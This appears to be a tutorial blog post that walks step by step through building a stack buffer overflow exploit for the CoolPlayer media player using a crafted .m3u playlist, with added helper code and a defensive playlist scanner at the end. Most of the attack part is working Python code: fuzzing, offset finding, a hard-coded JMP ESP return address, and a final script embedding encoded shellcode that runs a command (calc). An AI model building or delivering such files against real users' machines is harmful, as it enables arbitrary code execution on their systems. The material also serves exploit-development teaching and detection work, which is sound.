1. Make a file fuzzer, as shown below:
myfile = "cool.m3u"
myjunk = b"\x41" * 500             # 500 'A' bytes: one oversized playlist entry
with open(myfile, "wb") as f:      # binary mode, so the bytes reach the file unchanged
    f.write(myjunk)
print("Yess..")
Then run CoolPlayer under OllyDbg, load the file "cool.m3u", and it crashes. Look at the EIP register in OllyDbg: it has been overwritten.
Check the SEH chain; this is the result. Then press Shift+F9 to pass the exception on to the program.
2. Generate a unique cyclic pattern (the same pattern later used to compute the offset) and paste the result into the file fuzzer, which becomes:
myfile = "cool.m3u"
# 500-byte cyclic pattern: every 4 consecutive bytes are unique, so the bytes
# that land in EIP identify their exact position in the buffer
myjunk = (b"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9"
          b"Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9"
          b"Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9"
          b"Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9"
          b"Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9"
          b"Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9"
          b"Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9"
          b"Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9"
          b"Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9"
          b"Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9"
          b"Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9"
          b"Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9"
          b"Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9"
          b"An0An1An2An3An4An5An6An7An8An9"
          b"Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9"
          b"Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9"
          b"Aq0Aq1Aq2Aq3Aq4Aq5Aq")
with open(myfile, "wb") as f:
    f.write(myjunk)
print("Yess..")
Run CoolPlayer under OllyDbg again and load the fuzzed file; this is the resulting value of EIP.
3. Use DEADBEEF as a check. Before the DEADBEEF check, compute the pattern offset from the EIP value of step 2, then
edit the file fuzzer, which becomes:
myfile = "cool.m3u"
myjunk = b"\x90" * 260              # padding up to the computed offset of EIP
myjunk += b"\xEF\xBE\xAD\xDE"       # 0xDEADBEEF written little-endian, so EIP reads DEADBEEF
with open(myfile, "wb") as f:
    f.write(myjunk)
print("Yess..")
This is the result.
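As an added illustration of steps 2 and 3 (this is not code from the original post): the long string used in step 2 is the cyclic pattern that Metasploit's pattern_create emits, and the "pattern offset" is simply the position inside that string of the four bytes that ended up in EIP. The helper below rebuilds the pattern, converts a register value as OllyDbg prints it back into the bytes it came from (x86 is little-endian, which is also why 0xDEADBEEF is written into the file as EF BE AD DE), and locates the offset. The register value 0x37694136 is a constructed example: it is what EIP would hold if the overwrite sits at offset 260, the offset the post's step 3 assumes.

```python
import string
import struct


def pattern_create(length):
    """Rebuild the cyclic 'Aa0Aa1Aa2...' pattern (same scheme as Metasploit's
    pattern_create): chunks of upper+lower+digit, so any four consecutive
    bytes occur at exactly one position in the buffer."""
    chunks = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                chunks.append(upper + lower + digit)
                if 3 * len(chunks) >= length:
                    return "".join(chunks)[:length]
    raise ValueError("pattern longer than the 20280-byte cycle")


def pack_dword(value):
    """Little-endian encoding of a 32-bit value: the byte order the CPU reads
    a saved return address in, and the order the fuzzer must write it in."""
    return struct.pack("<I", value)


def pattern_offset(pattern, register_value):
    """Offset inside `pattern` of the bytes that landed in a register.

    The debugger shows EIP as one 32-bit number; packing it little-endian
    recovers the four bytes as they sat in memory. Returns -1 if the value
    did not come from the pattern at all."""
    needle = pack_dword(register_value).decode("ascii", errors="replace")
    return pattern.find(needle)


if __name__ == "__main__":
    pat = pattern_create(500)
    # constructed register value: EIP contents for an overwrite at offset 260
    print(pattern_offset(pat, 0x37694136))
    print(pack_dword(0xDEADBEEF))
```

If `pattern_offset` returns -1, the register did not take its value straight from the pattern (for example it was partially overwritten, or the bytes were mangled on the way in), and a different register or the stack contents need to be inspected instead.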
4. Finding JMP ESP
Open Executable modules; here I use shell32.dll. Double-click shell32.dll, then right-click, choose Search for > Command, and type JMP ESP.
This is the result.
Press Shift+F9 to check the stack; this is the result.
5. Edit your file fuzzer to pop the calculator, which proves that the pattern offset is correct. Open a browser, go to 127.0.0.1:55555, and choose the payload "windows execute command", as below:
#!/usr/bin/python
myfile = "cool.m3u"
myjunk = b"\x90" * 260               # padding up to the offset of EIP (step 3)
myjunk += b"\xD7\x30\x9D\x7C"        # address of the JMP ESP from step 4, little-endian
myjunk += b"\x90" * 16               # short NOP sled before the payload
# payload generated in step 5 ("windows execute command", calc)
myjunk += (b"\xdb\xdc\xb8\x76\x35\x3c\x23\x2b\xc9\xb1\x23\xd9\x74\x24\xf4\x5f"
           b"\x83\xef\xfc\x31\x47\x13\x03\x31\x26\xde\xd6\x41\xa0\x5a\x19\xb9"
           b"\x31\xe8\x5c\x85\xba\x92\x5b\x8d\xbd\x85\xef\x22\xa6\xd2\xaf\x9c"
           b"\xd7\x0f\x06\x57\xe3\x44\x98\x89\x3d\x9b\x02\xf9\xba\xdb\x41\x06"
           b"\x02\x11\xa4\x09\x46\x4d\x43\x32\x12\xb6\xa8\x31\x7f\x3d\xef\x9d"
           b"\x7e\xa9\x76\x56\x8c\x66\xfc\x37\x91\x79\xe9\x4c\xb5\xf2\xec\xb9"
           b"\x4f\x58\xcb\x39\x93\x50\xd3\x25\x98\xd3\xe3\x20\x5e\xab\x0f\xa1"
           b"\x1f\x40\x9b\xc5\x83\xf5\x10\x4d\xb4\xee\x2e\x06\x44\x40\x30\x18"
           b"\x45\x2a\x59\x24\x1a\x1d\x6c\x34\xf2\xd4\x68\x37\x3a\x9d\xd8\x5f"
           b"\x4b\xe8\xdd\xc0\xc3\x75\x23\x74\x1d\xd1\x23\x6f\x41\xbc\xb7\x0c"
           b"\x86")
with open(myfile, "wb") as f:
    f.write(myjunk)
print("Yess..")
Run CoolPlayer under OllyDbg, load the fuzzer file as before, and this is the result.
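From the defender's side, the property that makes every file in this walkthrough work (a playlist entry far longer than any real path, padded with bytes that are not text) is also what makes such a file easy to spot before it reaches a vulnerable player. The scanner below is an added example, not part of the original post: it walks the lines of a .m3u file, reports entries over a constructed length threshold of 256 bytes and entries that are not printable text, and is run here over two constructed sample playlists, one benign and one shaped like the step-3 file.

```python
MAX_ENTRY_LEN = 256   # constructed threshold: real paths and URLs stay well under this


def scan_m3u(data):
    """Return a list of (line_number, reason) findings for the bytes of a .m3u file.

    Directive lines (#EXTM3U, #EXTINF) and path lines are both checked for
    length and for being printable text; an entry that is neither is the
    shape of an overflow attempt rather than a playlist entry."""
    findings = []
    for lineno, raw in enumerate(data.split(b"\n"), start=1):
        line = raw.rstrip(b"\r")
        if not line:
            continue
        if len(line) > MAX_ENTRY_LEN:
            findings.append((lineno, "entry length %d exceeds %d" % (len(line), MAX_ENTRY_LEN)))
        try:
            text = line.decode("utf-8")
        except UnicodeDecodeError:
            # a NOP sled (0x90...) or packed addresses are not valid UTF-8
            findings.append((lineno, "entry is not valid UTF-8 text"))
            continue
        ctrl = sum(1 for ch in text if not ch.isprintable() and ch != "\t")
        if ctrl:
            findings.append((lineno, "%d non-printable characters in entry" % ctrl))
    return findings


def is_suspicious(data):
    """True if any finding was raised; a convenient verdict for a mail or upload filter."""
    return bool(scan_m3u(data))


# constructed sample playlists
BENIGN = (b"#EXTM3U\n"
          b"#EXTINF:123,Some Track\n"
          b"C:\\Music\\track01.mp3\n"
          b"http://example.invalid/stream.mp3\n")
OVERFLOW_SHAPED = b"#EXTM3U\n" + b"\x90" * 260 + b"\xef\xbe\xad\xde" + b"\n"
LONG_ASCII = b"#EXTM3U\n" + b"A" * 500 + b"\n"

if __name__ == "__main__":
    for name, sample in (("benign", BENIGN), ("overflow-shaped", OVERFLOW_SHAPED), ("long ascii", LONG_ASCII)):
        print(name, scan_m3u(sample))
```

Treat a finding as a triage signal rather than a verdict: a playlist saved in a legacy code page will also fail the UTF-8 check, so in an environment with such files decode with the player's locale instead, and keep the length check as the more robust of the two signals.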